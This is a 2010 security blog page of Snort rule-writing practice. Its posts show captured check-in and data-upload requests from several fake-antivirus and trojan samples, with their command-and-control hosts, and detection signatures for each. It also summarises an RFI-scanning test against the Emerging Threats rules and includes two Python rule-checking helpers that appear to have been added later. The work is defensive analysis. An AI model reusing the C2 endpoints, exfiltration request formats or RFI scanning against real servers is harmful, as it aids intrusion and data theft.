Showing posts with label snort. Show all posts

Tuesday, April 6, 2010

RFI Coverage in Emerging Threats

ha.ckers posted a Large List of RFIs (1000+) awhile back which caught my eye.

Continuing on with my socket programming practice, I put together rficrawl.c that loops through each remote file include pathname, stuffs it into a GET and launches it at a webserver.

I made a PCAP of the traffic while rficrawl was running and fed it to Snort. Snort was using a default snort.conf configuration file along with the Mar 27th version of Emerging Threats ruleset.

The alert breakdown is over here.

The Mar 26th version of RSnake's RFI list contains 2203 unique RFIs. There were 1541 alerts generated, resulting in about 70% coverage. The majority of them, 1410 alerts (64%), were triggered by the generic, catch-all "ET WEB_SERVER PHP Remote File Inclusion (monster list http)" signature.

This leaves 662 currently undetected vulnerabilities!

Friday, March 5, 2010

Snort Signature Practice: video.exe

video.exe is a fake AV malware. It resolves softmetalgroup.com (195.88.190.54) and does a GET for "/check". The server answers with a "200 OK" status, but the body it returns is a "404 Not Found" page:

GET /check HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: softmetalgroup.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:10:38 GMT
Content-Type: application/octet-stream
Content-Length: 208
Last-Modified: Fri, 16 Oct 2009 15:35:48 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /check was not found on this server.</p>
<hr>
</body></html>

This is part of the check-in process: the page doesn't match a proper 404 from nginx, as we'll see later.

A POST comes next that pushes a binary file:

POST /loads2.php?r=56.1 HTTP/1.1
Content-Type: multipart/form-data; boundary= 82859F64871E
User-Agent: Microsoft Internet Explorer
Host: softmetalgroup.com
Content-Length: 351
Connection: Keep-Alive

--82859F64871E
Content-Disposition: form-data; name="file"; filename="afile"
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream

...

--82859F64871E--

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:10:39 GMT
Content-Type: text/html; charset=windows-1252
Transfer-Encoding: chunked
Keep-Alive: timeout=20
X-Powered-By: PHP/5.3.1

2
OK
0

I base my signature on this request: the filename, the parameter name and the User-Agent:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"video.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/loads2.php?r="; content:"User-Agent\: Microsoft Internet Explorer|0D 0A|"; sid:0305201001;)

Next, there are multiple GETs for "/omni.gif". The User-Agent switches to something that looks more legitimate, and proper nginx 404 errors are returned:

GET http://softmetalgroup.com/omni.gif HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: softmetalgroup.com
Connection: close

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:12:21 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 529
Connection: close

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
...

I'm not sure if these are keep-alive requests or not.

References:

Virustotal
ThreatExpert
mwanalysis

Tuesday, March 2, 2010

Snort Signature Practice: decode.c

decode.c steps through a Snort signature and converts the printable bytes in its "content: |xx|" hex blocks to ASCII so that the rule is easier to read.

Using a sample (by Don Jackson of Secureworks) from Emerging Threats Virus rules:

dennis@ipa:~/projects/decode$ ./decode
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN RhiFrem Trojan Activity - cmd"; flow:to_server,established; content:"GET|20|"; offset:0; depth:4; content:"User|2D|Agent|3A 20|Mozilla|2F|5|2E|0|20|Gecko|2F|20050212|20|Firefox|2F|1|2E|5|2E|0|2E|2"; pcre:"/^GET\x20[^\x0D\x0A]+\x3Fmod\x3Dcmd\x26user\x3D\w+[^\x0D\x0A]*\x20HTTP\x2F1\x2E0\x0D\x0A.*\x0D\x0AHost\x3A\x20\w+/"; reference:url,www.castlecops.com/U_S_Courts_phish792683.html; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008139; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Rhifrem; sid:2008139; rev:3;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN RhiFrem Trojan Activity - cmd"; flow:to_server,established; content:"GET "; offset:0; depth:4; content:"User-Agent: Mozilla/5.0 Gecko/20050212 Firefox/1.5.0.2"; pcre:"/^GET\x20[^\x0D\x0A]+\x3Fmod\x3Dcmd\x26user\x3D\w+[^\x0D\x0A]*\x20HTTP\x2F1\x2E0\x0D\x0A.*\x0D\x0AHost\x3A\x20\w+/"; reference:url,www.castlecops.com/U_S_Courts_phish792683.html; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008139; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Rhifrem; sid:2008139; rev:3;)
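The same idea in Python, as an added example and not the decode.c from the post: every content/uricontent hex block is rewritten with its printable bytes as ASCII, while non-printable bytes, and the four characters Snort wants escaped inside a content string (double quote, semicolon, backslash, pipe; my choice to keep those in hex), are regrouped into hex runs. The pcre option is left alone because its \xNN escapes are a different syntax.

```python
import re

# Bytes that Snort requires escaped or in hex inside content:"...", so they stay as |xx|
KEEP_HEX = {0x22, 0x3B, 0x5C, 0x7C}  # " ; \ |
HEX_BLOCK = re.compile(r'\|([0-9A-Fa-f]{2}(?:\s+[0-9A-Fa-f]{2})*)\|')
# A content:"..." or uricontent:"..." value, allowing backslash-escaped characters inside
CONTENT_STR = re.compile(r'((?:uri)?content:")((?:[^"\\]|\\.)*)(")')

def decode_hex_block(hexpairs):
    """Render one |xx xx ...| block: printable bytes as ASCII, the rest regrouped into hex runs."""
    out, pending = [], []
    def flush():
        if pending:
            out.append("|" + " ".join(pending) + "|")
            pending.clear()
    for pair in hexpairs.split():
        value = int(pair, 16)
        if 0x20 <= value <= 0x7E and value not in KEEP_HEX:
            flush()
            out.append(chr(value))
        else:
            pending.append(pair.upper())
    flush()
    return "".join(out)

def decode_content(value):
    """Decode every hex block inside a single content value."""
    return HEX_BLOCK.sub(lambda m: decode_hex_block(m.group(1)), value)

def decode_rule(rule):
    """Decode the content/uricontent strings of a rule; pcre and every other option stay untouched."""
    return CONTENT_STR.sub(lambda m: m.group(1) + decode_content(m.group(2)) + m.group(3), rule)

# The ET RhiFrem rule quoted on this page
SAMPLE_RULE = r'alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN RhiFrem Trojan Activity - cmd"; flow:to_server,established; content:"GET|20|"; offset:0; depth:4; content:"User|2D|Agent|3A 20|Mozilla|2F|5|2E|0|20|Gecko|2F|20050212|20|Firefox|2F|1|2E|5|2E|0|2E|2"; pcre:"/^GET\x20[^\x0D\x0A]+\x3Fmod\x3Dcmd\x26user\x3D\w+[^\x0D\x0A]*\x20HTTP\x2F1\x2E0\x0D\x0A.*\x0D\x0AHost\x3A\x20\w+/"; reference:url,www.castlecops.com/U_S_Courts_phish792683.html; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008139; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Rhifrem; sid:2008139; rev:3;)'

if __name__ == "__main__":
    print(decode_rule(SAMPLE_RULE))
```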

Friday, January 22, 2010

Snort Signature Practice: Setup_2022.exe

Setup_2022.exe resolves greatnorthwill.com (91.213.121.52) and calls home via a GET request:

GET /?mod=vv&i=1&id=2022 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: greatnorthwill.com
Cache-Control: no-cache

For the signature I used the parameter names and the User-Agent string:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"Setup_2022.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?mod="; uricontent:"&i="; uricontent:"&id="; content:"User-Agent\: Mozilla|0D 0A|"; sid:012220101;)

"mod" and "i" stayed static on the test runs.

References:

Virustotal
ThreatExpert

Sunday, January 3, 2010

Snort Signature Practice: A-Install-815416_2009-1939.exe

A-Install-815416_2009-1939.exe pops up an error window, phones home to needforspeedeu.com (91.213.121.52) and also tries resolving thebigben.cn:

GET /?act=fb&1=1&2=1262237847&3=5.1.2.0.2600&4=IEXPLORE.EXE&5=18&6=4&7=127&8=19&9=0&10=2009-1939 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: needforspeedeu.com
Cache-Control: no-cache

After comparing a few captures, the parameters change like this:

act=fb (same)
1=1 (same)
2= up to 10 digits (diff)
3=5.1.x.0 (diff)
4=IEXPLORE.EXE (same)
5= 2 digits (diff)
6= 1 digit (diff)
7= up to 3 digits (diff)
8= up to 3 digits (diff)
9=0 (same)
10= possible timestamp (diff)

My first signature tries to match the particulars of the parameters with a pcre:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?act=fb&1=1"; pcre:"/&2=[0-9]{1,10}&3=5\.1\.[0-9]\.0\.2600&4=IEXPLORE\.EXE&5=[0-9]{2}&6=[0-9]&7=[0-9]{1,3}&8=[0-9]{1,3}&9=0&10=/"; sid:123120092;)

This didn't feel like a clean signature so I simplified it to:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware (simplified)"; flow:to_server; content:"GET"; http_method; uricontent:"/?act="; uricontent:"&1="; uricontent:"&2="; uricontent:"&3="; uricontent:"&4="; uricontent:"&5="; uricontent:"&6="; uricontent:"&7="; uricontent:"&8="; uricontent:"&9="; uricontent:"&10="; sid:010220101;)

References:

Virustotal
CWSandbox
ThreatExpert

Snort Signature Practice: spyeraser096.exe

spyeraser096.exe is one of those fake anti-virus malwares. It does a GET request to spyeraser.ir (193.104.110.81):

GET /statav.php?wmid=3&name=a0331bb5faf7707f HTTP/1.1
Host: spyeraser.ir

I used the file and parameter names for the signature:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"spyeraser096.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/statav.php?wmid="; uricontent:"&name="; sid:010120101;)

References:

Virustotal
ThreatExpert

Snort Signature Practice: n-bss.exe

n-bss.exe does a GET phone home to gateshis.cn (91.213.174.9) then tries to download another n-bss.exe binary from blogcz.cn (not resolving):

GET /knock.php?id=SYSTEM!WINXP!B857B9C9 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gateshis.cn
Connection: Keep-Alive

knock.php's id parameter is delimited by "!". "SYSTEM" remained consistent on my packet captures--user name of the process? The next field is the computer's name. I'm not sure about the last field:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"n-bss.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/knock.php?id="; pcre:"/id=SYSTEM!.*!/"; sid:123120091;)

References:

Virustotal
ThreatExpert

Snort Signature Practice: logo.exe

logo.exe POSTs a base64 encoded file to gator.php on yourclicker.cn (124.217.251.182). It also resolves ya.ru (77.88.21.8, 213.180.204.8, 93.158.134.8), but I never saw any traffic to these IPs:

POST /gator.php HTTP/1.0
Host: yourclicker.cn
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 3088

a=&b=&d=&c=UDNNTAAAAAA/BwAAEQAAAAAAAAAIAAAAIyw9LCyblXsSAAAAAAAAABAAAADZBwwABAAfABcA
AgAiAPkBEwAAAAAAAACkAAAApAAAAAMAAAA1NTI3NC02NDEtMjM4Mjk1Ni0yMzg0NAAuAAAA
...more base64

I based the signature on the file name and the POST parameter names; the out-of-order d and c parameters felt unique.

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"logo.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/gator.php"; content:"a="; content:"&b="; content:"&d="; content:"&c="; sid:123120093;)
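To check rules like the ones in these posts against the captured request before loading them into Snort, here is a minimal evaluator I wrote for this page (not the blog's code and not Snort): it walks the content, uricontent, http_method and pcre options in order and ignores everything else, including offset/depth and pcre flags. It is run on the two A-Install-815416 rules above, which shows what the pcre version pins down that the simplified one does not, and on the logo.exe rule, where it shows that without distance/within modifiers the d-before-c ordering is not actually enforced; the request bodies with altered parameters are constructed.

```python
import re

# Option tokenizer for the text inside "( ... )": keyword, then an optional quoted or bare value
TOKEN = re.compile(r'\s*(\w+)(?::"((?:[^"\\]|\\.)*)"|:([^;]*))?\s*;')
HEX = re.compile(r'\|([0-9A-Fa-f ]+)\|')

def content_text(value):
    """Literal text Snort searches for: |xx| blocks become raw bytes and \\: \\; \\" are unescaped."""
    text = HEX.sub(lambda m: bytes.fromhex(m.group(1)).decode("latin-1"), value)
    return re.sub(r'\\([:;"\\])', r'\1', text)

def rule_matches(rule, request):
    """Evaluate content/uricontent/http_method/pcre, in order, against one raw request (CRLF on the wire).
    flow, msg, sid, offset/depth and pcre flags are ignored: this is a reading aid, not Snort."""
    method, uri = request.split("\r\n", 1)[0].split(" ")[:2]
    opts = rule[rule.index("(") + 1:rule.rindex(")")]
    last = None  # most recent content value, so a following http_method can be applied to it
    for kw, quoted, _bare in TOKEN.findall(opts):
        if kw == "content":
            last = content_text(quoted)
            if last not in request:
                return False
        elif kw == "uricontent" and content_text(quoted) not in uri:
            return False
        elif kw == "http_method" and last != method:
            return False
        elif kw == "pcre" and not re.search(quoted[1:quoted.rindex("/")], request):
            return False  # the /.../ delimiters are stripped; trailing flags are not handled
    return True

# Rules quoted from this page: the two A-Install-815416 signatures and the logo.exe one
PCRE_RULE = r'alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?act=fb&1=1"; pcre:"/&2=[0-9]{1,10}&3=5\.1\.[0-9]\.0\.2600&4=IEXPLORE\.EXE&5=[0-9]{2}&6=[0-9]&7=[0-9]{1,3}&8=[0-9]{1,3}&9=0&10=/"; sid:123120092;)'
SIMPLE_RULE = 'alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware (simplified)"; flow:to_server; content:"GET"; http_method; uricontent:"/?act="; uricontent:"&1="; uricontent:"&2="; uricontent:"&3="; uricontent:"&4="; uricontent:"&5="; uricontent:"&6="; uricontent:"&7="; uricontent:"&8="; uricontent:"&9="; uricontent:"&10="; sid:010220101;)'
LOGO_RULE = 'alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"logo.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/gator.php"; content:"a="; content:"&b="; content:"&d="; content:"&c="; sid:123120093;)'

def a_install_request(param3="5.1.2.0.2600"):
    """The captured A-Install GET from this page, with parameter 3 swappable (constructed)."""
    uri = "/?act=fb&1=1&2=1262237847&3=%s&4=IEXPLORE.EXE&5=18&6=4&7=127&8=19&9=0&10=2009-1939" % param3
    return ("GET %s HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla\r\n"
            "Host: needforspeedeu.com\r\nCache-Control: no-cache\r\n\r\n" % uri)

def logo_request(body):
    """Header skeleton of the captured logo.exe POST with a constructed body."""
    return "POST /gator.php HTTP/1.0\r\nHost: yourclicker.cn\r\n\r\n" + body

if __name__ == "__main__":
    print(rule_matches(PCRE_RULE, a_install_request()), rule_matches(SIMPLE_RULE, a_install_request()))
    print(rule_matches(PCRE_RULE, a_install_request("6.0.0.0.6000")))  # pcre pins the 5.1.x.0.2600 shape
    # Without distance/within, content matches are independent, so d-before-c is not enforced:
    print(rule_matches(LOGO_RULE, logo_request("a=&b=&c=x&d=")))
```

content_text also handles the "User-Agent\: Mozilla|0D 0A|" form used in the video.exe and Setup_2022.exe rules, so those can be checked the same way against their captured requests.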

References:

Virustotal
ThreatExpert